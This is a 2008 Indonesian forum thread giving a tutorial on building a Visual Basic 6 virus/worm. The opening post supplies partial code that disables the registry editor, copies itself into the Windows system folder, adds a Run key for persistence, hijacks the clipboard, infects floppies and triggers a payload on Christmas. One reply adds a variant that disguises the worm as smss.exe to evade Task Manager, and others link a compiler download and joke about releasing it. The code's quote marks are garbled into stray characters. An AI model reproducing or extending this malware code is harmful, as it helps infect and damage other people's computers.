Cahaya yang menyinari forum [COMICK, MUSIC, GAME, ANIME & COMPUTER] @ Hikari-Community [at] dal.net
 
HomePortalFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Dasar Perakitan Virus/Worm dengan VB6

View previous topic View next topic Go down 
AuthorMessage
ea_ngel
Hikari Master
Hikari Master


Jumlah posting : 657
Reputation : 2
Join date : 2008-04-18

Status
Race: Undead
Class: Magician

PostSubject: Dasar Perakitan Virus/Worm dengan VB6   Wed Jun 18, 2008 8:39 am

Beberapa dekade belakangan ini mulai banyak bermunculan virus/worm lokal yang dirakit menggunakan bahasa pemrograman VB6. Bagaimanakah teknik pembuatan virus tersebut ? Disini saya akan memberikan sedikit ilustrasi mengenai dasar perakitan Virus/Worm dengan menggunakan bahasa pemrograman VB6.

Pada dasarnya sebuah Virus/Worm memiliki ciri khas berikut :

1.Mampu menggandakan diri

2.Mampu melindungi diri [stealth]

3.Mampu memanipulasi sistem

4.Mampu unjuk gigi [pamer]

5.Mampu melakukan rekayasa sosial.

Kita lanjut dengan contoh potongan coding virus/worm menggunakan VB6. Coding sengaja dipotong untuk menghindari anak kecil yang lagi belajar copy paste dan ga sengaja bikin virus di VB
覧覧覧覧覧覧覧覧覧覧覧

Private Sub Form_Load()
On Error Resume Next
If App.PrevInstance = True Then End
Call RegDisable
Call InfeksiSistem
If App.Path = 鄭:\ Or 釘:\ Then
Unload Me
End If
End Sub

覧覧覧覧覧覧覧覧覧覧覧

Potongan kode ini melakukan beberapa hal yaitu :

On Error Resume Next :

Apabila terjadi error, maka program akan melanjutkan rutin kode selanjutnya.

If App.PrevInstance = True Then End :

Apabila virus telah aktif, maka akhiri program.

Call RegDisable
Call InfeksiSistem

Memanggil rutin prosedur RegDisable dan Infeksi sistem .

If App.Path = 鄭:\ Or 釘:\ Then
Unload Me

Apabila virus aktif pada drive A:\ atau B:\ maka akhiri program.

覧覧覧覧覧覧覧覧覧覧覧

Private Sub WormTimer_Timer()
On Error Resume Next
Clipboard.Clear
Clipboard.SetText 徹hh rembulan.. !!!
End Sub

覧覧覧覧覧覧覧覧覧覧覧

Kode diatas merupakan prosedur timer, yang akan dieksekusi setiap panjang detik tertentu.Saat dieksekusi, virus akan melakukan perintah :

Clipboard.Clear
Clipboard.SetText 徹hh rembulan.. !!!

yaitu menghapus clipboard pada komputer anda, dan setiap kali anda melakukan fungsi 菟aste pada program , maka akan tercetak tulisan 徹hh rembulan. !!!

覧覧覧覧覧覧覧覧覧覧覧

Private Sub WormTimer2_Timer()
On Error Resume Next
Call InfeksiDisket
If Day(Now) = 25 And Month(Now) = 12 Then
Call Payload
Unload Me
End If
End Sub

覧覧覧覧覧覧覧覧覧覧覧

Kode ini juga merupakan prosedur timer yang akan dieksekusi setiap detik tertentu, saat dieksekusi virus akan melakukan perintah :

Call InfeksiDisket
If Day(Now) = 25 And Month(Now) = 12 Then
Call Payload
Unload Me

Yaitu memanggil prosedur InfeksiDisket, kemudian jika hari ini adalah Natal, yaitu tanggal 25 Desember, maka virus memanggil prosedur Payload. Jika Bukan hari natal, maka virus tidak memanggil prosedur ini.

覧覧覧覧覧覧覧覧覧覧覧

Function RegString(HiveAndKey As String, _
Value As String)
Dim wormreg As Variant
Set wormreg = CreateObject(背script.Shell)
wormreg.Regwrite HiveAndKey, Value
End Function

Function RegDWord(HiveAndKey As String, _
Value As Integer)
Dim wormreg As Variant
Set wormreg = CreateObject(背script.shell)
wormreg.Regwrite HiveAndKey, Value, 迭EG_DWORD
End Function

覧覧覧覧覧覧覧覧覧覧覧

Pada baris kode ini, virus mendeklarasikan fungsi RegString dan RegDWord untuk melakukan manipulasi pada registry windows.

覧覧覧覧覧覧覧覧覧覧覧

Private Sub RegDisable()
On Error Resume Next
RegDWord 滴KCU\Software\Microsoft\Windows\Current & _
天ersion\Policies\System\DisableRegistryTools, 1
End Sub

覧覧覧覧覧覧覧覧覧覧覧

Pada prosedur RegDisable ini , Virus akan menonaktifkan fungsi Regedit pada Windows, sehingga dapat melindungi dirinya dari penghapusan.

覧覧覧覧覧覧覧覧覧覧覧

Private Sub InfeksiSistem()
On Error Resume Next
Dim infeksiworm As Variant
Dim sysfolder As Object
Set infeksiworm = CreateObject(敗cripting.filesystemobject)
Set sysfolder = infeksiworm.GetSpecialFolder(1)
FileCopy WormFile, sysfolder & 貼 & 努indll.exe
RegString 滴KLM\Software\Microsoft\Windows\Curr & _
兎ntVersion\Run\windll, sysfolder & 貼 & 努indll.exe
End Sub

覧覧覧覧覧覧覧覧覧覧覧

Pada prosedur InfeksiSistem, virus akan mencari direktori System Windows dengan baris kode dibawah ini :

Dim infeksiworm As Variant
Dim sysfolder As Object
Set infeksiworm = CreateObject(敗cripting.filesystemobject)
Set sysfolder = infeksiworm.GetSpecialFolder(1)

Kemudian Virus akan menggandakan dirinya dengan baris kode berikut :

FileCopy WormFile, sysfolder & 貼 & 努indll.exe

Selain itu virus juga akan memanipulasi registry agar dijalankan setiap kali booting masuk ke windows :

RegString 滴KLM\Software\Microsoft\Windows\Curr & _
兎ntVersion\Run\windll, sysfolder & 貼 & 努indll.exe
Selain itu virus juga akan memanipulasi registry agar dijalankan setiap kali booting masuk ke windows :

RegString 滴KLM\Software\Microsoft\Windows\Curr & _
兎ntVersion\Run\windll, sysfolder & 貼 & 努indll.exe

Oke deh, sekian perkenalan kita dengan dasar perakitan Virus/Worm VB6 Smile Silahkan belajar lebih lanjut mengenai Virus/Worm melalui internet dan juga buku-buku hacking yang belakangan ini marak terbit ditoko buku.

Referensi :

Computer Worm 1 - Secret of UnderGround Coding by Achmad Darmal.
Back to top Go down
View user profile
[bLaCk-HoL3]
Hikari Master
Hikari Master


Jumlah posting : 249
Reputation : 0
Join date : 2008-04-18
Age : 26
Lokasi : Manado City

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Wed Jun 18, 2008 8:47 am

mantafff bro!!!! Very Happy:D:D:D
Back to top Go down
View user profile
blu3_cyb3r
Hikari Addict
Hikari Addict


Jumlah posting : 137
Reputation : 0
Join date : 2008-04-18

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jun 20, 2008 1:54 pm

asik tuh kayaknya...
coba ahh....
Back to top Go down
View user profile
blu3_cyb3r
Hikari Addict
Hikari Addict


Jumlah posting : 137
Reputation : 0
Join date : 2008-04-18

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Thu Jun 26, 2008 9:36 am

EA Ngel wrote:

Private Sub InfeksiSistem()
On Error Resume Next
Dim infeksiworm As Variant
Dim sysfolder As Object
Set infeksiworm = CreateObject(敗cripting.filesystemobject)
Set sysfolder = infeksiworm.GetSpecialFolder(1)
FileCopy WormFile, sysfolder & 貼 & 努indll.exe
RegString 滴KLM\Software\Microsoft\Windows\Curr & _
兎ntVersion\Run\windll, sysfolder & 貼 & 努indll.exe
End Sub


Cuma mo nambahin dikit tentang infeksi system nieh, boleh kan...
biar pirusznya gak bisa di kill ama task manager...
kasih nama piruz seperti nama system windows (smss, csrss, services, svchost, winlogon, lsass, dll)
truz taruh piruz itu di taruh di drive tempat windows terinstall...

for the example :

Private Sub InfeksiSistem()
On Error Resume Next
Dim infeksiworm As Variant
Dim sysfolder As Object
Set infeksiworm = CreateObject(敗cripting.filesystemobject)
Set sysfolder = infeksiworm.GetSpecialFolder(1)
FileCopy WormFile, sysfolder & 貼 & 都mss.exe
RegString 滴KLM\Software\Microsoft\Windows\Curr & _
兎ntVersion\Run\smss, sysfolder & 貼 & 都mss.exe
End Sub

lol! lol! lol! lol! lol!
Back to top Go down
View user profile
bL4Ck_3n91n3
Hikari Master
Hikari Master


Jumlah posting : 358
Reputation : 0
Join date : 2008-04-18
Age : 24

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jun 27, 2008 3:04 am

klo masalah visual basic kasi ama blu3_cyb3r aza Very Happy

btw klo dah jadi jangan lupa di aktifin Razz
Back to top Go down
View user profile http://hikari-community.co.nr
Terra
Hikari Addict
Hikari Addict


Jumlah posting : 147
Reputation : 0
Join date : 2008-06-05
Age : 23

Status
Race: Human
Class: Swordman

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jun 27, 2008 4:02 am

lagi2x..

dengan bangga...


kukatakan..


nggak ngaertii!!!!
Back to top Go down
View user profile http://profiles.friendster.com/zeroisnobody
bL4Ck_3n91n3
Hikari Master
Hikari Master


Jumlah posting : 358
Reputation : 0
Join date : 2008-04-18
Age : 24

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jun 27, 2008 5:52 am

gini om mending om download dulu programnya visual basic 6 buat compile tuh worm jadi .exe


http://www.4shared.com/file/39866128/31ba68d3/Visual_Basic_6_Portable_By_EKO_X.html

sedot Razz
Back to top Go down
View user profile http://hikari-community.co.nr
blu3_cyb3r
Hikari Addict
Hikari Addict


Jumlah posting : 137
Reputation : 0
Join date : 2008-04-18

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jun 27, 2008 9:47 am

bL4Ck_3n91n3 wrote:
klo masalah visual basic kasi ama blu3_cyb3r aza Very Happy

btw klo dah jadi jangan lupa di aktifin Razz

ah biasa aja kali omz....
Back to top Go down
View user profile
blu3_cyb3r
Hikari Addict
Hikari Addict


Jumlah posting : 137
Reputation : 0
Join date : 2008-04-18

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jun 27, 2008 9:51 am

bL4Ck_3n91n3 wrote:
gini om mending om download dulu programnya visual basic 6 buat compile tuh worm jadi .exe


http://www.4shared.com/file/39866128/31ba68d3/Visual_Basic_6_Portable_By_EKO_X.html

sedot Razz
kalo menurutq sih vb portable tuh kurang bagus...
coz... componentnya dikit banget....
tp kl bwat belajar seh gpp seh...
What a Face What a Face What a Face What a Face What a Face

ngomongイ vb portablenya dipassword tuh
kl gak passnya : www.blackcyber.co.nr ya omz b_3
Back to top Go down
View user profile
gonzhack
Hikari Newbie
Hikari Newbie


Jumlah posting : 16
Reputation : 0
Join date : 2008-05-31

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jul 11, 2008 2:58 am

betul lebih baik jangan yang portble...

contohnya kyak virus w tapi syangna kedetek ma PCMAV (si*lan)..........

klo mo nge view iso liat di google keyword:gonzhack

xixixixixi


oh yach bung En ANgel chat kya biasa lagi dunk lagi sbuk nih....!
wkwkwkwkwk
Back to top Go down
View user profile
ea_ngel
Hikari Master
Hikari Master


Jumlah posting : 657
Reputation : 2
Join date : 2008-04-18

Status
Race: Undead
Class: Magician

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Fri Jul 11, 2008 11:54 am

gonzhack wrote:
betul lebih baik jangan yang portble...

oh yach bung En ANgel chat kya biasa lagi dunk lagi sbuk nih....!
wkwkwkwkwk

Portable VB cuman altrenatif, apabila klo kita mau buat virus di warnet trus diwarnet gak ada VB.
well,emank sih di Portable VB ada beberapa kekurangan. Antara lain compile exe nya.


ak sering kok chat Very Happy
Back to top Go down
View user profile
chevi
Hikari Newbie
Hikari Newbie


Jumlah posting : 5
Reputation : 0
Join date : 2009-08-12

PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Wed Aug 12, 2009 8:29 pm

mantap bozzzz
thanks abissss
Back to top Go down
View user profile
Sponsored content




PostSubject: Re: Dasar Perakitan Virus/Worm dengan VB6   Today at 7:20 pm

Back to top Go down
 
Dasar Perakitan Virus/Worm dengan VB6
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» UUD NEGARA REPUBLIK CINTA TAHUN 2009
» Taktik Memutuskan Hubungan dengan Kekasih
» Tips Mengatasi Kejenuhan dengan Pasangan
» 10 Negara dengan Jumlah Perokok TerTinggi di Dunia
» Virus yang lagi Hangat

Permissions in this forum:You cannot reply to topics in this forum
Hikari Community :: Komputer :: Malicious Code [Malware, Virus, Hijack, Spyware dll]-
Jump to: